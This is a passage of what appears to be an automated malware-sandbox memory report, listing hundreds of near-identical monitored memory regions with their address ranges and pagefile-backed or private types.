monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15147 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15148 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15149 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15150 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15151 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15152 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15153 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15154 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15155 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15156 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15157 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15158 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15159 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15160 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15161 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15162 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15163 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15164 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15165 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15166 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15167 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15168 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15169 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15170 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15171 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15172 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15173 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15174 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15175 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15176 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15177 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15178 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15179 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15180 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15181 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15182 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15183 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 15184 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 15185 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15186 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15187 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 15188 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 15189 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15190 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15191 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15192 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15193 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15194 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15195 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15196 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15197 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15198 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15199 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15200 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15201 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15202 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15203 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15204 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15205 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15206 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15207 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15208 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15209 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15210 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15211 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15212 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15213 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15214 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15215 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15216 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15217 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15218 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15219 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 15220 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15221 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15222 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15223 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15224 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15225 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15226 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15227 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15228 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15229 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15230 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15231 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15232 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15233 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15234 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15235 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15236 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15237 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15238 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15239 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15240 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15241 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15242 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15243 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15244 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15245 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15246 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15247 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15248 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15249 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15250 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15251 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15252 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15253 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15254 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15255 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15256 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15257 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15258 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15259 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15260 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15261 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 15262 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15263 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15264 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15265 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15266 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15267 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15268 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15269 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15270 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15271 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15272 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15273 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15274 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15275 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15276 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15277 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15278 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15279 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15280 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15281 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15282 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15283 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15284 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15285 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15286 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15287 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15288 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15289 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15290 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15291 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15292 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15293 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15294 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15295 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 15296 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 15297 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15298 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 15299 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 15300 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 15301 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15302 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15303 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 15304 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 15305 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15306 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15307 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 15308 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 15309 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15310 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15311 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15312 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15313 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15314 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15315 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15316 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15317 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15318 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15319 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15320 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15321 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15322 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15323 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15324 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15325 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 15326 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 15327 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15328 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15329 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15330 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15331 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15332 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 15333 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = 